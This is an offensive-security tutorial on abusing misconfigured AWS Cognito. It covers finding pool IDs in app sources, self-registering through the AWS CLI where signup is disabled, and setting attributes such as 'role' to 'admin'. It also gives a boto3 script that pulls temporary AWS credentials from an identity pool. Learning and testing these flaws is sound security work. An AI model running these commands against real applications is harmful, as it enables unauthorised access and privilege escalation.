Attacking AWS | Common Cognito Misconfigurations

Introduction

AWS Cognito is a fully managed service provided by Amazon Web Services (AWS) that simplifies the process of user authentication and authorization for web and mobile applications. It offers a comprehensive set of features to handle user registration, sign-in, and user management, eliminating the need for developers to build these functionalities from scratch.

While the attacks and misconfigurations discussed in this article are well-documented and have been addressed by various resources, it is crucial to reiterate their significance to emphasize the importance of secure configuration and ongoing monitoring in AWS Cognito deployments.

Contents

• AWS Cognito components
• Common UserPools attacks
  - Detect Cognito UserPools usage
  - Attack examples
• Common IdentityPools attacks
  - Detect Cognito IdentityPools usage
  - Attack examples

AWS Cognito components

AWS Cognito provides two main components: user pools and identity pools.

1. User pools: User pools allow developers to create and manage a customizable user directory to handle user registration, sign-in, and account recovery. User pools support various authentication methods, including username and password, social login (e.g., through Google or Facebook), and multi-factor authentication (MFA). User pools also handle user profile management, allowing you to store custom attributes specific to your application’s needs.
2. Identity pools: Identity pools, also known as federated identities, enable users to obtain temporary AWS credentials to access AWS services. With identity pools, you can integrate third-party identity providers (such as Google, Facebook, or your own identity system) to authenticate users and grant them access to AWS resources.

Cognito UserPool

Cognito IdentityPool

💡 Quick tip: if you see aws-sdk.min.js or amazon-cognito.min.js loaded by an application, then you should definitely search for Cognito parameters or hardcoded AWS credentials.

Common UserPools attacks

One of the key aspects of AWS Cognito user pools is the generation and utilization of JSON Web Tokens (JWTs) for authentication and authorization.

Detect Cognito UserPools usage:

To identify the usage of Cognito UserPools, look for the UserPoolID or ClientId in the JS/HTML sources of the application.

UserPoolID in the source file

Additionally, observe login/signup calls to AWS Cognito made by the web application.

Web application makes a call to Cognito

Attack examples

So, lets dive into the common attack vectors.

Let’s consider a scenario where a web service uses Cognito, but no signup option is available.

Login form. No registration is avaliable

Here is what we can try:

1. Sign-up Bypass: An attacker can attempt to bypass the regular application registration process by using the AWS CLI. By executing the “aws cognito-idp sign-up” command with appropriate parameters (e.g., a fake email address and a chosen password), the attacker can initiate the registration process without following the intended steps.

aws cognito-idp sign-up --client-id '[ClientId]' --username 'mail@hacker.com' --password 's3cr4tP@ss' --user-attributes '[{"Name":"email","Value":"mail@email.com"}]'

Signing up

2. Confirmation of Sign-up: After initiating the sign-up process, the attacker needs to confirm the user account. This can be achieved using the “aws cognito-idp confirm-sign-up” command, which requires the client ID and the username/email used during the sign-up process, along with a confirmation code.

aws cognito-idp confirm-sign-up — client-id '[ClientId]' — username 'mail@hacker.com' — confirmation-code '013370'

Confirmation code email recieved after signup command

Confirming signup

3. Login and JWT Token Acquisition: With the created user account, the attacker can initiate the login process to obtain a JWT token. By using the “aws cognito-idp initiate-auth” command with the appropriate region, client ID, and authentication parameters (username and password), the attacker can obtain the JWT token from the response.

aws cognito-idp initiate-auth --region YOUR_REGION --client-id YOUR_CLIENT_ID --auth-flow USER_PASSWORD_AUTH --auth-parameters USERNAME=YOUR_USERNAME,PASSWORD=YOUR_PASSWORD

Otherwise, you can just enter the freshly registered credentials directly into the login form.

Trying to sign in with the created account

Application is passing credentials to Cognito. Cognito returns a JWT token.

Login is successful. Registration is bypassed.

4. Manipulating User Attributes: Once the attacker possesses a valid JWT token, they can interact with the user pool by manipulating user attributes. Using the “aws cognito-idp update-user-attributes” command, the attacker can modify attributes such as email or app role directly, potentially granting themselves elevated privileges or changing account information.

Look for some interesting parameters such as “email_verified”, “admin”, “debug_mode”, “is_premium” etc. If there are no appropriate Lambda triggers or miscofigured rights you will be able to change the attribute from CLI.

Expanding the attack vectors, the attacker can attempt to specify an email address of an existing user with different capitalization (e.g., user@test.com and UsEr@test.com). If the application normalizes the email address on the back-end before logging in, this could lead to unauthorized access.

To get the list of attributes set for a user, run command:

aws cognito-idp get-user --access-token [AccessToken]

Then try changing the attributes directly:

aws cognito-idp update-user-attributes --access-token 'TOKEN' --user-attributes '[{"Name":"email","Value":"any@mail.com"}, {"Name":"role","Value":"admin"}]' --region=us-east-2

Common IdentityPools attacks

Detect Cognito IdentityPools usage:

There is IdentityPoolD found in JS/HTML sources. Additionally, you may find references to retrieving temporary AWS credentials using JWT tokens.

IdentityPoolId in sources

You can retrieve temporary AWS credentials from the identity pool. These credentials can then be used to access AWS resources.

It could be done via CLI:

aws cognito-identity get-id --identity-pool-id <identity-pool-id> 

aws cognito-identity get-credentials-for-identity --identity-id <identity-id-from-previous-command> 

Or using Python script:

import boto3
region='us-east-1'

identity_pool='us-east-1:XXXXXXXXXXXXXXXXXXXXXXXXXX'
client = boto3.client('cognito-identity',region_name=region)

_id = client.get_id(IdentityPoolId=identity_pool)
_id = _id['IdentityId']
credentials = client.get_credentials_for_identity(IdentityId=_id)
access_key = credentials['Credentials']['AccessKeyId']
secret_key = credentials['Credentials']['SecretKey']
session_token = credentials['Credentials']['SessionToken']
identity_id = credentials['IdentityId']

print("Access Key: " + access_key)
print("Secret Key: " + secret_key)
print("Session Token: " + session_token)
print("Identity Id: " + identity_id)

Or you can just intercept application requests to Cognito:

Retritving AWS credentials

Attack examples

Then you can run automated tools (Check the TOP free tools) or manually explore AWS account via CLI. But privilege escalation is a topic for another article.

👏🆂🆃🅰🆈 🆃🆄🅽🅴🅳 🅰🅽🅳 🆂🆄🅱🆂🅲🆁🅸🅱🅴!👏

Running ScoutSuite using temporary credentials

🌐 My social networks: https://linktr.ee/s_novoselov